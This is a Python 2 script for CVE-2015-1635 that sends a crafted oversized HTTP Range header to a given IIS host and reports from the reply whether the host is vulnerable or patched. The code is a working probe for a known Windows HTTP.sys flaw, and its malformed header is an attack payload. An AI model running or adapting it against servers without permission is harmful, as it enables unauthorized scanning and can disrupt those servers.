CVE-2015-1635

1. #/usr/bin/python
2. #run on python 2.7
3. #Tested on Win 7 IIS 7.5 BY SCOPS.
4. import socket,sys
5.  
6. if len(sys.argv)<=1:   
7.     sys.exit('Give IP')
8.  
9. Host = sys.argv[1]
10.  
11. def SendPayload(Payload, Host):
12.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13.     s.connect((Host, 80))
14.     s.send(Payload)
15.     response=s.recv(1024)
16.     #print(response)
17.     s.close()
18.    
19.     if "Range" in Payload:
20.         print("test status:")
21.         if "Requested Range Not Satisfiable" in response :
22.             print("The Host:%s is vulnerable" %Host)
23.         elif "The request has an invalid header name" in response:
24.             print ("The Host:%s has patched" %Host )
25.         else:
26.             print("The Host:%s unknown status" %Host)
27.     #print("---------------------------------------")
28.    
29. FullALLFfff=0xffffffffffffffff
30. Init = "GET / HTTP/1.1\r\nHost: scops\r\n\r\n"
31. Payload = "GET / HTTP/1.1\r\nHost: scops\r\nRange: bytes=0-" + str(int(FullALLFfff)) + "\r\n\r\n"
32. #print("IP: %s "%Host)
33. #print(Init)
34. SendPayload(Init, Host)
35. #print(Payload)
36. SendPayload(Payload, Host)